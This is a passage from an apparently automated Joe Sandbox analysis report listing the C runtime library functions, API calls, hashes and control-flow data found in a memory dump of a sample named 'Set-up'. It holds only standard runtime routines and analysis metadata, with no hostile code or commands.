                                                                                              • _wdupenv_s.MSVCR100(?,00000000,?), ref: 6BB70B66
                                                                                                • Part of subcall function 6BB6FD24: _lock.MSVCR100(00000007,6BB6FD98,0000000C), ref: 6BB6FD32
                                                                                              • _wcslen.LIBCMT(?), ref: 6BB70B8B
                                                                                              • _errno.MSVCR100(00000000,00000000,00000000), ref: 6BB70BAE
                                                                                              • _wcslen.LIBCMT(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB70C08
                                                                                              • wcscpy_s.MSVCR100(00000000,00000002,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB70C51
                                                                                              • _waccess_s.MSVCR100(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BB70C68
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB70C8B
                                                                                              • wcscpy_s.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB70CA5
                                                                                              • free.MSVCR100(?), ref: 6BB70CE1
                                                                                              • _errno.MSVCR100 ref: 6BB910C4
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB910CE
                                                                                              • _wfullpath.MSVCR100(?,?,?), ref: 6BB910E7
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6BB9110D
                                                                                              • _wcslen.LIBCMT(?,00000000,00000000,00000000,00000000,00000000), ref: 6BB91118
                                                                                              • _calloc_crt.MSVCR100(00000002,00000002,?,00000000,00000000,00000000,00000000,00000000), ref: 6BB91124
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB9113F
                                                                                              • _errno.MSVCR100(?,?,?,00000000,00000000,00000000), ref: 6BB9115A
                                                                                              • _wcslen.LIBCMT(?,?,?,?,00000000,00000000,00000000), ref: 6BB9116A
                                                                                              • _calloc_crt.MSVCR100(00000002,00000002,?,?,?,?,00000000,00000000,00000000), ref: 6BB91176
                                                                                              • _errno.MSVCR100 ref: 6BB911AF
                                                                                              • _errno.MSVCR100 ref: 6BB911BA
                                                                                              • free.MSVCR100(?), ref: 6BB911CC
                                                                                              • free.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB911F0
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB911F6
                                                                                              • free.MSVCR100(?), ref: 6BB91209
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_wcslenfree$_calloc_crt_waccess_swcscpy_s$AttributesFile__invoke_watson_invalid_parameter_noinfo_lock_wdupenv_s_wfullpath
                                                                                              • String ID:
                                                                                              • API String ID: 1320518012-0
                                                                                              • Opcode ID: 2d16c8cb30f4bf3282a3a46e8449694e65e11ec3c0a60ea0ed7e3f3375987356
                                                                                              • Instruction ID: 2c2194d6abe7543a196652fbeece775504218d1b06cc6af2973fcf23b4f25591
                                                                                              • Opcode Fuzzy Hash: 2d16c8cb30f4bf3282a3a46e8449694e65e11ec3c0a60ea0ed7e3f3375987356
                                                                                              • Instruction Fuzzy Hash: 9D919E71D402A9AEDB25AF74EC89B9D77B8EF05304F5000F6D408A7250FB398E809F91
                                                                                              Function 6BB6B398 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 110libraryloadermemoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1860 6bb6b398-6bb6b3aa GetModuleHandleW 1861 6bb8769c-6bb876a4 call 6bbac86f 1860->1861 1862 6bb6b3b0-6bb6b3f8 GetProcAddress * 4 1860->1862 1864 6bb6b3fe-6bb6b405 1862->1864 1865 6bb876a5-6bb876c4 1862->1865 1864->1865 1867 6bb6b40b-6bb6b412 1864->1867 1867->1865 1868 6bb6b418-6bb6b41a 1867->1868 1868->1865 1869 6bb6b420-6bb6b42e TlsAlloc 1868->1869 1870 6bb6b4f6-6bb6b4f8 1869->1870 1871 6bb6b434-6bb6b43f TlsSetValue 1869->1871 1873 6bb6b4ee-6bb6b4f0 1870->1873 1871->1870 1872 6bb6b445-6bb6b48b call 6bb6b365 EncodePointer * 4 call 6bb6b525 1871->1872 1878 6bb6b4f1 call 6bbac86f 1872->1878 1879 6bb6b48d-6bb6b4aa DecodePointer 1872->1879 1878->1870 1879->1878 1882 6bb6b4ac-6bb6b4be call 6bb61ee1 1879->1882 1882->1878 1885 6bb6b4c0-6bb6b4d3 DecodePointer 1882->1885 1885->1878 1887 6bb6b4d5-6bb6b4ed call 6bb6215f GetCurrentThreadId 1885->1887 1887->1873
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B3A0
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6BB6B3BD
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6BB6B3CA
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6BB6B3D7
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6BB6B3E4
                                                                                              • TlsAlloc.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B420
                                                                                              • TlsSetValue.KERNEL32(00000000,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B43B
                                                                                              • __init_pointers.LIBCMT ref: 6BB6B445
                                                                                                • Part of subcall function 6BB6B365: _encoded_null.MSVCR100(74DEDFB0,6BB6B44A,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B368
                                                                                                • Part of subcall function 6BB6B365: __initp_misc_winsig.LIBCMT ref: 6BB6B388
                                                                                              • EncodePointer.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B456
                                                                                              • EncodePointer.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B463
                                                                                              • EncodePointer.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B470
                                                                                              • EncodePointer.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B47D
                                                                                              • DecodePointer.KERNEL32(?,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B49E
                                                                                              • _calloc_crt.MSVCR100(00000001,00000214,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B4B3
                                                                                              • DecodePointer.KERNEL32(00000000,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B4CD
                                                                                              • _initptd.MSVCR100(00000000,00000000,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B4D8
                                                                                                • Part of subcall function 6BB6215F: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6BB62200,00000008,6BB875E9,00000000,00000000), ref: 6BB62170
                                                                                                • Part of subcall function 6BB6215F: _lock.MSVCR100(0000000D), ref: 6BB621A4
                                                                                                • Part of subcall function 6BB6215F: InterlockedIncrement.KERNEL32(?), ref: 6BB621B1
                                                                                                • Part of subcall function 6BB6215F: _lock.MSVCR100(0000000C), ref: 6BB621C5
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BB6B4DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pointer$AddressEncodeProc$DecodeHandleModule_lock$AllocCurrentIncrementInterlockedThreadValue__init_pointers__initp_misc_winsig_calloc_crt_encoded_null_initptd
                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                              • API String ID: 3305441573-3819984048
                                                                                              • Opcode ID: ae53f31044db2db9ba81f699bc83bbb23e90beae690e7aef5c06f99856b05a30
                                                                                              • Instruction ID: aa2ef2af8f364cb2d1322c414f91f24464f3b5f119c0495e95c99ea989976ee0
                                                                                              • Opcode Fuzzy Hash: ae53f31044db2db9ba81f699bc83bbb23e90beae690e7aef5c06f99856b05a30
                                                                                              • Instruction Fuzzy Hash: 403182319002E1AEDF21AF76CC06A163BF4EB9A7A5B16061FE42483150EB7AC941CF70
                                                                                              Function 6BBD612B Relevance: 36.3, APIs: 24, Instructions: 344COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • operator+.LIBCMT ref: 6BBD6146
                                                                                                • Part of subcall function 6BBD5907: DName::DName.LIBCMT ref: 6BBD591A
                                                                                                • Part of subcall function 6BBD5907: DName::operator+.LIBCMT ref: 6BBD5921
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::Name::operator+operator+
                                                                                              • String ID:
                                                                                              • API String ID: 2937105810-0
                                                                                              • Opcode ID: 4dcb17e78cb6c50a451538c0a1ceaf6eef10898e2428128b8da718cf2d4d1818
                                                                                              • Instruction ID: 5e5795d7caaec2bca71bacc54d6cfaab31061ee1c79fee7872847ac7f28ffc28
                                                                                              • Opcode Fuzzy Hash: 4dcb17e78cb6c50a451538c0a1ceaf6eef10898e2428128b8da718cf2d4d1818
                                                                                              • Instruction Fuzzy Hash: EAD13075900289AFDF05DFA8D881AEEBBF8EF05354F10406AE515E7290EB3CDA45CB51
                                                                                              Function 6BB654B9 Relevance: 34.8, APIs: 23, Instructions: 295COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB512D7
                                                                                              • free.MSVCR100(?), ref: 6BB5131B
                                                                                              • _malloc_crt.MSVCR100(00000004), ref: 6BB654FE
                                                                                                • Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5
                                                                                              • _calloc_crt.MSVCR100(00000180,00000002,00000004), ref: 6BB6550E
                                                                                              • _calloc_crt.MSVCR100(00000180,00000001,00000180,00000002,00000004), ref: 6BB65519
                                                                                              • _calloc_crt.MSVCR100(00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6BB65524
                                                                                              • _calloc_crt.MSVCR100(00000101,00000001,00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6BB65533
                                                                                              • GetCPInfo.KERNEL32(?,?), ref: 6BB65586
                                                                                              • ___crtGetStringTypeA.LIBCMT ref: 6BB655CA
                                                                                              • __crtLCMapStringA.MSVCR100(00000000,?,00000100,?,000000FF,?,000000FF,?,00000000), ref: 6BB655FD
                                                                                              • __crtLCMapStringA.MSVCR100(00000000,?,00000200,?,000000FF,?,000000FF,?,00000000), ref: 6BB6562A
                                                                                              • memcpy.MSVCR100(?,?,000000FE), ref: 6BB65684
                                                                                              • memcpy.MSVCR100(?,?,0000007F,?,?,000000FE), ref: 6BB65693
                                                                                              • memcpy.MSVCR100(?,?,0000007F,?,?,0000007F,?,?,000000FE), ref: 6BB656A5
                                                                                              • free.MSVCR100(?), ref: 6BB656FA
                                                                                                • Part of subcall function 6BB6014E: HeapFree.KERNEL32(00000000,00000000,?,6BB87602,00000000), ref: 6BB60164
                                                                                              • free.MSVCR100(?,?), ref: 6BB90A76
                                                                                              • free.MSVCR100(?,?,?), ref: 6BB90A7E
                                                                                              • free.MSVCR100(?,?,?,?), ref: 6BB90A86
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$_calloc_crt$Stringmemcpy$__crt$DecrementFreeHeapInfoInterlockedType___crt_malloc_crtmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 3303389740-0
                                                                                              • Opcode ID: f25745781956eeccf69593e50eee2aa33bfea91bb05e9ce17e2f4de7d2287501
                                                                                              • Instruction ID: 94fa8db88e8c8e9c8cca79343caa8dd75be028f1ea3e0345be54e85ecdf32ac0
                                                                                              • Opcode Fuzzy Hash: f25745781956eeccf69593e50eee2aa33bfea91bb05e9ce17e2f4de7d2287501
                                                                                              • Instruction Fuzzy Hash: 01B18BB2D00289AFEB10CFA9C891BEEBBF5FF09304F44006DE555A7250E739A951CB65
                                                                                              Function 6BB726C3 Relevance: 34.7, APIs: 23, Instructions: 213COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcsnlen.MSVCR100(?,00007FFF), ref: 6BB726ED
                                                                                              • wcsnlen.MSVCR100(?,00007FFF,?,00007FFF), ref: 6BB726F8
                                                                                              • _calloc_crt.MSVCR100(00000002,00000002), ref: 6BB72717
                                                                                              • wcscpy_s.MSVCR100(00000000,00000002,?), ref: 6BB7272E
                                                                                              • wcscpy_s.MSVCR100(?,00000002,?,00000000,00000002,?), ref: 6BB7274B
                                                                                                • Part of subcall function 6BB7248A: wcschr.MSVCR100(00000000,0000003D,74DEDF80,00000000,01331910), ref: 6BB724B5
                                                                                                • Part of subcall function 6BB7248A: free.MSVCR100(?,74DEDF80,00000000,01331910), ref: 6BB72528
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BB72789
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BB727A5
                                                                                              • _calloc_crt.MSVCR100(00000000,00000001), ref: 6BB727B2
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BB727CB
                                                                                              • _strlen.LIBCMT(?), ref: 6BB727DD
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 6BB727FB
                                                                                              • _errno.MSVCR100 ref: 6BB72820
                                                                                              • _errno.MSVCR100 ref: 6BB90FD6
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB90FE1
                                                                                              • wcschr.MSVCR100(?,0000003D), ref: 6BB90FF1
                                                                                              • wcsnlen.MSVCR100(-00000002,00007FFF), ref: 6BB91015
                                                                                              • _wcslen.LIBCMT(?), ref: 6BB91021
                                                                                              • _calloc_crt.MSVCR100(00000001,00000002,?), ref: 6BB9102C
                                                                                              • wcscpy_s.MSVCR100(00000000,00000001,?), ref: 6BB91042
                                                                                              • _errno.MSVCR100 ref: 6BB9104F
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB9105A
                                                                                              • free.MSVCR100(?), ref: 6BB91075
                                                                                              • free.MSVCR100(?), ref: 6BB91097
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$_calloc_crt_errnofreewcscpy_swcsnlen$_invalid_parameter_noinfowcschr$_strlen_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 928254730-0
                                                                                              • Opcode ID: be26e0fc733374c5904f27346f85945ed9d0c668de09a7d20da8501be59f9abe
                                                                                              • Instruction ID: 29153244b1c8a177a6f063a3a1edeb0493ed394698647bbdde52c4c99c0b06e5
                                                                                              • Opcode Fuzzy Hash: be26e0fc733374c5904f27346f85945ed9d0c668de09a7d20da8501be59f9abe
                                                                                              • Instruction Fuzzy Hash: A851F7319052A4BEDB21ABB59C86D9F3B6CDF47B74B2045B5F02496180FB3ECA4087A0
                                                                                              Function 6BB77B2C Relevance: 33.3, APIs: 18, Strings: 1, Instructions: 87COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _FindAndUnlinkFrame.MSVCR100(?), ref: 6BB77B42
                                                                                                • Part of subcall function 6BB77840: _getptd.MSVCR100 ref: 6BB77846
                                                                                                • Part of subcall function 6BB77840: _getptd.MSVCR100 ref: 6BB7785A
                                                                                              • _getptd.MSVCR100 ref: 6BB77B58
                                                                                              • _getptd.MSVCR100 ref: 6BB77B67
                                                                                              • _getptd.MSVCR100 ref: 6BB77B78
                                                                                              • _getptd.MSVCR100 ref: 6BB77B8C
                                                                                              • _IsExceptionObjectToBeDestroyed.MSVCR100(?), ref: 6BB77B9A
                                                                                                • Part of subcall function 6BB77C17: _getptd.MSVCR100(?,6BB77B9F,?), ref: 6BB77C1C
                                                                                              • _getptd.MSVCR100(00000001), ref: 6BB77BA6
                                                                                              • __DestructExceptionObject.MSVCR100(?,00000001), ref: 6BB77BB1
                                                                                              • _getptd.MSVCR100 ref: 6BB77BB8
                                                                                              • _getptd.MSVCR100 ref: 6BB77BC7
                                                                                              • _getptd.MSVCR100 ref: 6BB77BD8
                                                                                              • _getptd.MSVCR100 ref: 6BB77BF6
                                                                                              • _getptd.MSVCR100 ref: 6BB77C04
                                                                                              • _getptd.MSVCR100 ref: 6BB8CA49
                                                                                              • _getptd.MSVCR100 ref: 6BB8CA61
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _getptd$ExceptionObject$DestroyedDestructFindFrameUnlink
                                                                                              • String ID: csm
                                                                                              • API String ID: 473968603-1018135373
                                                                                              • Opcode ID: 7c00eafc30ea7a7b13f024ac2faff1589b0cf6e0009a91ce2b35c0ac754900c2
                                                                                              • Instruction ID: b61a2154bf00b4e6872f8b69da187ff572ed13b8ad22149a08ff3135db04147a
                                                                                              • Opcode Fuzzy Hash: 7c00eafc30ea7a7b13f024ac2faff1589b0cf6e0009a91ce2b35c0ac754900c2
                                                                                              • Instruction Fuzzy Hash: 13311830505280CFC214AF67C485E5D37A5EF90269F8684F9D4688FA32DFBADD84CBA1
                                                                                              Function 6BB735D0 Relevance: 33.2, APIs: 22, Instructions: 192COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcsrchr.MSVCR100(?,0000005C), ref: 6BB7360D
                                                                                              • wcsrchr.MSVCR100(?,0000002F,?,0000005C), ref: 6BB73617
                                                                                              • wcsrchr.MSVCR100(00000000,0000002E), ref: 6BB73636
                                                                                              • _waccess_s.MSVCR100(?,00000000), ref: 6BB7364A
                                                                                              • _errno.MSVCR100 ref: 6BB7367D
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8833A
                                                                                              • wcschr.MSVCR100(?,0000003A), ref: 6BB8834A
                                                                                              • _wcslen.LIBCMT(?), ref: 6BB8835C
                                                                                              • _calloc_crt.MSVCR100(00000003,00000002,?), ref: 6BB88367
                                                                                              • wcscpy_s.MSVCR100(00000000,00000003,6BB93048), ref: 6BB8837F
                                                                                              • wcscat_s.MSVCR100(00000000,00000003,?), ref: 6BB8838E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcsrchr$_calloc_crt_errno_invalid_parameter_noinfo_waccess_s_wcslenwcscat_swcschrwcscpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 255226058-0
                                                                                              • Opcode ID: d923334df452a3b743e8c6f1b58ce0d232cc07eca25a7ed18c8500c5f2be50c0
                                                                                              • Instruction ID: ea5d9130708150e2a73962785b4b0b328e00171487b08b90b158a7efbaa74644
                                                                                              • Opcode Fuzzy Hash: d923334df452a3b743e8c6f1b58ce0d232cc07eca25a7ed18c8500c5f2be50c0
                                                                                              • Instruction Fuzzy Hash: 1451E632D04695EBEB21AF75DC82A9E3778EF01794F400164ED24A7294FB3DCE119B50
                                                                                              Function 6BB72614 Relevance: 31.7, APIs: 21, Instructions: 218COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _mbschr.MSVCR100(00000000,0000003D,00000000,00000000,74DEDFF0), ref: 6BB7263B
                                                                                                • Part of subcall function 6BB725FD: _mbschr_l.MSVCR100(00000000,00000000,00000000,?,6BB72640,00000000,0000003D,00000000,00000000,74DEDFF0), ref: 6BB7260A
                                                                                              • free.MSVCR100(?,00000000,00000000,74DEDFF0), ref: 6BB726A2
                                                                                              • _errno.MSVCR100(00000000,00000000,74DEDFF0), ref: 6BB726B4
                                                                                              • _errno.MSVCR100(74DEDFF0), ref: 6BB91B83
                                                                                              • _invalid_parameter_noinfo.MSVCR100(74DEDFF0), ref: 6BB91B8E
                                                                                              • ___wtomb_environ.LIBCMT ref: 6BB91BB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$___wtomb_environ_invalid_parameter_noinfo_mbschr_mbschr_lfree
                                                                                              • String ID:
                                                                                              • API String ID: 679965329-0
                                                                                              • Opcode ID: 329496b33e263765d15e1caf43f93bc4f178034bb08b705c4f134d874d0530c1
                                                                                              • Instruction ID: 1e6b4ea66840dd280a189e158ddfd6ae0423b67f9fe8b4a3550d9a120fef15d1
                                                                                              • Opcode Fuzzy Hash: 329496b33e263765d15e1caf43f93bc4f178034bb08b705c4f134d874d0530c1
                                                                                              • Instruction Fuzzy Hash: 5E61F3B6904191EFDB20EFB8D9C195C77F4EB06714B2505BED530AB180EB39DA80CB51
                                                                                              Function 6BB7248A Relevance: 30.2, APIs: 20, Instructions: 229COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcschr.MSVCR100(00000000,0000003D,74DEDF80,00000000,01331910), ref: 6BB724B5
                                                                                              • free.MSVCR100(?,74DEDF80,00000000,01331910), ref: 6BB72528
                                                                                              • _errno.MSVCR100(74DEDF80,00000000,01331910), ref: 6BB773F0
                                                                                              • _errno.MSVCR100(01331910), ref: 6BB91473
                                                                                              • _invalid_parameter_noinfo.MSVCR100(01331910), ref: 6BB9147E
                                                                                              • ___mbtow_environ.LIBCMT ref: 6BB914B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$___mbtow_environ_invalid_parameter_noinfofreewcschr
                                                                                              • String ID:
                                                                                              • API String ID: 3080074160-0
                                                                                              • Opcode ID: df3d6bf7e81a7e12cb96ae0f2f584e6df57bfd0b2e85d4a03efdf108f1fdaa3b
                                                                                              • Instruction ID: 084180ed92761785ee319ba63ae17c3d56b1a80ffba5e329b2106eac061e3242
                                                                                              • Opcode Fuzzy Hash: df3d6bf7e81a7e12cb96ae0f2f584e6df57bfd0b2e85d4a03efdf108f1fdaa3b
                                                                                              • Instruction Fuzzy Hash: 91714772A042A0FFCB21AF78D88195C37F4EF4AB54B25417AE421D7180EB78CA81DB91
                                                                                              Function 6BB6F9A4 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 233COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DName::DName.LIBCMT ref: 6BB8D3AE
                                                                                              • DName::DName.LIBCMT ref: 6BB8D3E3
                                                                                              • atol.MSVCR100(6BB6F99F,6BB6F99F,00000010,FFFF0000,?,00000000), ref: 6BB8D46D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
